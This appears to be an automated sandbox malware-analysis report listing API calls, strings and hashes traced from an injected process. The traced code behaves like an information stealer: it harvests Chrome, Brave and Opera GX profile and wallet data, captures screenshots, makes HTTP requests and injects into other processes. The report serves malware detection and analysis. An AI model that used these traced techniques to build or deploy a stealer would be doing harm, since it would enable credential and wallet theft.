75845 2a105c7 2 API calls 75844->75845 75846 2a050c7 75845->75846 75847 2a1058d lstrcpy 75846->75847 75848 2a050d2 75847->75848 75849 2a050e8 lstrlen lstrlen HttpSendRequestA 75848->75849 75850 2a0515c InternetReadFile 75849->75850 75851 2a05176 InternetCloseHandle 75850->75851 75854 2a0511c 75850->75854 75852 2a02920 75851->75852 75852->75778 75853 2a10609 3 API calls 75853->75854 75854->75850 75854->75851 75854->75853 75855 2a1058d lstrcpy 75854->75855 75855->75854 75857 2a139e1 ExitProcess 75856->75857 75858 2a139e8 strtok_s 75856->75858 75860 2a13b48 75858->75860 75872 2a13a04 75858->75872 75859 2a13b2a strtok_s 75859->75860 75859->75872 75860->74681 75861 2a13a21 StrCmpCA 75861->75859 75861->75872 75862 2a13a75 StrCmpCA 75862->75859 75862->75872 75863 

Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll

Control-flow Graph

[Control-flow graph of the code starting at 2a14cc8; legend: Executed / Not Executed]
                                                                                                                                                                              APIs
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14D1C
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A14D33
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14D4F
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14D60
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A369F8), ref: 02A14D81
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A369FC), ref: 02A14D9B
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14DC2
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3660F), ref: 02A14DD6
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14DFF
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14E16
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14E28
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A14E3D
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A14E82
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14E94
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A14EA9
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A14EC2
                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02A14ED7
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,02A36A28,02A3661D), ref: 02A14F90
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A14FA0
                                                                                                                                                                                • Part of subcall function 02A12166: CreateFileA.KERNEL32(02A14FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,02A14FAC,?), ref: 02A12181
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A14FB6
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 02A14FC1
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A14FE7
                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 02A15105
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A15125
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                              • API String ID: 956187361-332874205
                                                                                                                                                                              • Opcode ID: d7667292521a7296a746854aecd4423a62ccb4594da1c6329b23b45095620722
                                                                                                                                                                              • Instruction ID: 9540589eccca80a9b48f12bb79061c1b0506d95856434cc087a67a995372d777
                                                                                                                                                                              • Opcode Fuzzy Hash: d7667292521a7296a746854aecd4423a62ccb4594da1c6329b23b45095620722
                                                                                                                                                                              • Instruction Fuzzy Hash: 19C12972D4022AAFDF22AF64DD85AEE777DAF08314F4045A1FA09B2140DB35DB998F50

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A367F2,02A367EF,02A37324,02A367EE,?,?,?), ref: 02A09DC6
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37328), ref: 02A09DE7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3732C), ref: 02A09E01
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,02A37330,?,02A367F3), ref: 02A09E93
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Brave,02A37350,02A37354,02A37330,?,02A367F3), ref: 02A0A015
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 02A0A02F
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0A0EF
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0A1BE
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A1FC
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A266
                                                                                                                                                                              • StrCmpCA.SHLWAPI(02A0CCE9), ref: 02A0A279
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A35C
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0A41C
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 02A0A4C1
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0A522
                                                                                                                                                                                • Part of subcall function 02A08DDB: lstrlen.KERNEL32(?), ref: 02A08FD4
                                                                                                                                                                                • Part of subcall function 02A08DDB: lstrlen.KERNEL32(?), ref: 02A08FEF
                                                                                                                                                                                • Part of subcall function 02A09549: lstrlen.KERNEL32(?), ref: 02A09970
                                                                                                                                                                                • Part of subcall function 02A09549: lstrlen.KERNEL32(?), ref: 02A0998B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A553
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0A613
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0A6AA
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A0A76E
                                                                                                                                                                              • FindClose.KERNELBASE(?), ref: 02A0A782
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                              • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                              • API String ID: 4173076446-1189830961

                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6CAEF688,00001000), ref: 6CA635D5
                                                                                                                                                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CA635E0
                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 6CA635FD
                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CA6363F
                                                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CA6369F
                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6CA636E4
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6CA63773
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6CAEF688), ref: 6CA6377E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6CAEF688), ref: 6CA637BD
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6CA637C4
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6CAEF688), ref: 6CA637CB
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6CAEF688), ref: 6CA63801
                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6CA63883
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CA63902
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CA63918
                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CA6394C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680314610.000000006CA61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6CA60000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                              • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                              • API String ID: 301339242-3790311718

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                              • API String ID: 2178766154-445461498
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 02A1180E
                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1181F
                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A11830
                                                                                                                                                                              • CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A1184A
                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11880
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 02A118DB
                                                                                                                                                                                • Part of subcall function 02A11757: __EH_prolog3_catch.LIBCMT ref: 02A1175E
                                                                                                                                                                                • Part of subcall function 02A11757: CoCreateInstance.COMBASE(02A331B0,00000000,00000001,02A3AF60,?), ref: 02A11781
                                                                                                                                                                                • Part of subcall function 02A11757: SysAllocString.OLEAUT32(?), ref: 02A1178E
                                                                                                                                                                                • Part of subcall function 02A11757: _wtoi64.MSVCRT ref: 02A117C1
                                                                                                                                                                                • Part of subcall function 02A11757: SysFreeString.OLEAUT32(?), ref: 02A117DA
                                                                                                                                                                                • Part of subcall function 02A11757: SysFreeString.OLEAUT32(00000000), ref: 02A117E1
                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 02A1190A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02A11916
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A1191D
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 02A1195C
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A11949
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$CreateFreeHeapInitializeInstanceTimeVariant$AllocAllocateBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                              • API String ID: 2464074849-461178377
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                              • Opcode ID: 251dfc3252171cc39e55f33fa3f302977711a9cdda6824e9a174214bcad735ee
                                                                                                                                                                              • Instruction ID: f009e351dfb3bbabad4aa42f2801efe6f7801f658906b45db16c9db3f8cf65a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 251dfc3252171cc39e55f33fa3f302977711a9cdda6824e9a174214bcad735ee
                                                                                                                                                                              • Instruction Fuzzy Hash: BC02A8B1D442688FDF21CF64C8807AEBBB6AF45334F0444EAD949A7246DB349E84CF56
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0527E
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A05285
                                                                                                                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A052A7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A052C1
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A052F1
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A05330
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05360
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A0536B
                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A05394
                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 02A053DA
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A05439
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A05445
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A05451
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                              • String ID: GET
                                                                                                                                                                              • API String ID: 442264750-1805413626
                                                                                                                                                                              • Opcode ID: 3f41ad9fd004cf70fc394002d901cb0dda24fc7b4131ea016c9f329cd63ca9a1
                                                                                                                                                                              • Instruction ID: e104e4be5958cb97c7c7137be187f09f34eaa2ef78e81fbd9ea2a48d63fe905c
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f41ad9fd004cf70fc394002d901cb0dda24fc7b4131ea016c9f329cd63ca9a1
                                                                                                                                                                              • Instruction Fuzzy Hash: CB512971D40A2CAFDB219F50ED84BEBBBB9EB08346F4005E5E509A2180DB719FD18F51
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02A11F96
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 02A11FA4
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 02A11FB1
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02A11FB8
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02A11FC1
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02A11FD1
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 02A11FDE
                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02A11FFA
                                                                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 02A12049
                                                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 02A12052
                                                                                                                                                                              • GlobalSize.KERNEL32(?), ref: 02A1205E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A05482: lstrlen.KERNEL32(?), ref: 02A05519
                                                                                                                                                                                • Part of subcall function 02A05482: StrCmpCA.SHLWAPI(?,02A36986,02A3697B,02A3697A,02A3696F), ref: 02A05588
                                                                                                                                                                                • Part of subcall function 02A05482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A055AA
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 02A120BC
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 02A120D7
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 02A120E0
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02A120E8
                                                                                                                                                                              • CloseWindow.USER32(00000000), ref: 02A120EF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2610876673-0
                                                                                                                                                                              • Opcode ID: f3beac42ce27489ece966c56140ccb6933174166a41b37a4cfc754b8a5957b36
                                                                                                                                                                              • Instruction ID: 764f33173fa438c1bde38076cdd1a55c020bb8abb134dde25b31524a61c5b668
                                                                                                                                                                              • Opcode Fuzzy Hash: f3beac42ce27489ece966c56140ccb6933174166a41b37a4cfc754b8a5957b36
                                                                                                                                                                              • Instruction Fuzzy Hash: 5651EB72C40228AFDB11AFE0ED48AEE7F79FF08315B544A25F905F2110EB319A65DB61
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A3A9AC,02A3A9B0,02A369FA,02A369F7,02A17908,?,00000000), ref: 02A01FA4
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3A9B4), ref: 02A01FD7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3A9B8), ref: 02A01FF1
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A3A9BC,02A3A9C0,?,02A3A9C4,02A369FB), ref: 02A020DD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A022C3
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A02336
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A023A2
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A023B6
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A025DC
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0264F
                                                                                                                                                                                • Part of subcall function 02A16E97: Sleep.KERNEL32(000003E8,?,?), ref: 02A16EFE
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A026C6
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A026DA
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 1475085387-1173974218
                                                                                                                                                                              • Opcode ID: cb6cf2cbe29d8095e917f6796d786bdc80ff0eaf475c42e79ce0c55b9fabad43
                                                                                                                                                                              • Instruction ID: b0d23e640f47af57bf7f704b5abc060cbee8b43cb25c2578104a5ad72e74ad75
                                                                                                                                                                              • Opcode Fuzzy Hash: cb6cf2cbe29d8095e917f6796d786bdc80ff0eaf475c42e79ce0c55b9fabad43
                                                                                                                                                                              • Instruction Fuzzy Hash: FD329831D812299BDF21FB24EE8978DB37AAF44354F4141E1A948B7160DF70AF898F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A1546A
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A15481
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A80), ref: 02A154A2
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A84), ref: 02A154BC
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A1550D
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15520
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15534
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15547
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36A88), ref: 02A15559
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A1556D
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A15623
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A15637
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
